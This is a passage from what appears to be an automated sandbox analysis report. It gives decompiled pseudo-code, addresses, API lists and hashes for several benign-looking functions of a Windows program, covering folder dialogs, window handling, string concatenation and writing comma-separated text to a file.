                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                0x0040ad06
                                                                                                                0x0040ad0a
                                                                                                                0x0040ad0c
                                                                                                                0x0040ad14
                                                                                                                0x0040ad19
                                                                                                                0x0040ad1f
                                                                                                                0x0040ad23
                                                                                                                0x0040ad27
                                                                                                                0x0040ad2a
                                                                                                                0x0040ad2d
                                                                                                                0x0040ad34
                                                                                                                0x0040ad3b
                                                                                                                0x0040ad3e
                                                                                                                0x0040ad44
                                                                                                                0x0040ad48
                                                                                                                0x0040ad4a
                                                                                                                0x0040ad52
                                                                                                                0x0040ad5a
                                                                                                                0x0040ad64
                                                                                                                0x0040ad65
                                                                                                                0x0040ad6b
                                                                                                                0x0040ad6c
                                                                                                                0x0040ad73
                                                                                                                0x0040ad76
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7c
                                                                                                                0x0040ad7f
                                                                                                                0x0040ad84

                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                0x00404a62
                                                                                                                0x00404a6a
                                                                                                                0x00404a6e
                                                                                                                0x00404a71
                                                                                                                0x00404a74
                                                                                                                0x00404a92
                                                                                                                0x00404a92
                                                                                                                0x00404a76
                                                                                                                0x00404a76
                                                                                                                0x00404a87
                                                                                                                0x00404a90
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00404a90
                                                                                                                0x00404aa3
                                                                                                                0x00404aa7
                                                                                                                0x00404aa7
                                                                                                                0x00404a94
                                                                                                                0x00404a98

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                0x004072e0
                                                                                                                0x004072f7
                                                                                                                0x004072fd
                                                                                                                0x00407316
                                                                                                                0x00407342

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                0x00408dd0
                                                                                                                0x00408dd2
                                                                                                                0x00408de2
                                                                                                                0x00408df4
                                                                                                                0x00408e01
                                                                                                                0x00408e1b
                                                                                                                0x00408e21
                                                                                                                0x00408e28
                                                                                                                0x00408e30
                                                                                                                0x00408dd4
                                                                                                                0x00408dd8
                                                                                                                0x00408dd8

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                0x004050e1
                                                                                                                0x004050ec
                                                                                                                0x004050ee
                                                                                                                0x004050f5
                                                                                                                0x004050ff
                                                                                                                0x00405114
                                                                                                                0x00405118
                                                                                                                0x00405123
                                                                                                                0x00405128
                                                                                                                0x00405101
                                                                                                                0x00405109
                                                                                                                0x0040510f
                                                                                                                0x0040512e

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscatwcsncat
                                                                                                                • String ID:
                                                                                                                • API String ID: 291873006-0
                                                                                                                • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                0x00402de0
                                                                                                                0x00402de2
                                                                                                                0x00402dec
                                                                                                                0x00402def
                                                                                                                0x00402dfb
                                                                                                                0x00402e0c
                                                                                                                0x00402e0e
                                                                                                                0x00402e0e
                                                                                                                0x00402e16
                                                                                                                0x00402e18
                                                                                                                0x00402e1a
                                                                                                                0x00402e21

                                                                                                                APIs
                                                                                                                • GetClientRect.USER32 ref: 00402DEF
                                                                                                                • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                  • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                  • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 4235085887-0
                                                                                                                • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                0x0040b6a6
                                                                                                                0x0040b6ad
                                                                                                                0x0040b6af
                                                                                                                0x0040b6b0
                                                                                                                0x0040b6b5
                                                                                                                0x0040b6b6
                                                                                                                0x0040b6bd
                                                                                                                0x0040b6bf
                                                                                                                0x0040b6c0
                                                                                                                0x0040b6c5
                                                                                                                0x0040b6c6
                                                                                                                0x0040b6cd
                                                                                                                0x0040b6cf
                                                                                                                0x0040b6d0
                                                                                                                0x0040b6d5
                                                                                                                0x0040b6d6
                                                                                                                0x0040b6dd
                                                                                                                0x0040b6df
                                                                                                                0x0040b6e0
                                                                                                                0x00000000
                                                                                                                0x0040b6e5
                                                                                                                0x0040b6e6

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                0x00407362
                                                                                                                0x00407369
                                                                                                                0x0040736e
                                                                                                                0x00407371
                                                                                                                0x00407378
                                                                                                                0x0040737e
                                                                                                                0x00407381
                                                                                                                0x00407386
                                                                                                                0x0040739f
                                                                                                                0x00407388
                                                                                                                0x00407391
                                                                                                                0x00407391
                                                                                                                0x004073a4
                                                                                                                0x004073ac
                                                                                                                0x004073ad
                                                                                                                0x004073cd
                                                                                                                0x004073d0
                                                                                                                0x004073d3
                                                                                                                0x004073d6
                                                                                                                0x004073e0
                                                                                                                0x004073e7
                                                                                                                0x004073ee
                                                                                                                0x004073f5
                                                                                                                0x0040741a
                                                                                                                0x0040741a
                                                                                                                0x0040741d
                                                                                                                0x00407420
                                                                                                                0x00407423
                                                                                                                0x00407426
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004073fc
                                                                                                                0x00407400
                                                                                                                0x0040740f
                                                                                                                0x00407412
                                                                                                                0x00407412
                                                                                                                0x00407402
                                                                                                                0x00407402
                                                                                                                0x00407407
                                                                                                                0x00407407
                                                                                                                0x00407413
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x00407419
                                                                                                                0x0040742f
                                                                                                                0x00407434
                                                                                                                0x00407437
                                                                                                                0x00407439
                                                                                                                0x0040743b
                                                                                                                0x0040743b
                                                                                                                0x0040744e
                                                                                                                0x00407453
                                                                                                                0x00407453
                                                                                                                0x004073af
                                                                                                                0x004073b2
                                                                                                                0x004073ba
                                                                                                                0x004073bb
                                                                                                                0x00000000
                                                                                                                0x004073bd
                                                                                                                0x004073c3
                                                                                                                0x004073c3
                                                                                                                0x004073bb
                                                                                                                0x0040745c
                                                                                                                0x00407468
                                                                                                                0x00407468
                                                                                                                0x0040746d
                                                                                                                0x00407473
                                                                                                                0x0040747c
                                                                                                                0x0040748e

                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                0x00401676
                                                                                                                0x0040167e
                                                                                                                0x0040168a
                                                                                                                0x0040168c
                                                                                                                0x00401690
                                                                                                                0x00401691
                                                                                                                0x00401696
                                                                                                                0x0040169d
                                                                                                                0x004016a2
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016ad
                                                                                                                0x004016ae
                                                                                                                0x004016b3
                                                                                                                0x004016b9
                                                                                                                0x004016bb
                                                                                                                0x004016bc
                                                                                                                0x004016c1
                                                                                                                0x004016c8
                                                                                                                0x004016cd
                                                                                                                0x004016ce
                                                                                                                0x004016ea
                                                                                                                0x004016ff
                                                                                                                0x0040170c
                                                                                                                0x004016d0
                                                                                                                0x004016e3
                                                                                                                0x004016e3
                                                                                                                0x00401711
                                                                                                                0x00401714
                                                                                                                0x00000000
                                                                                                                0x00401719
                                                                                                                0x0040171c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
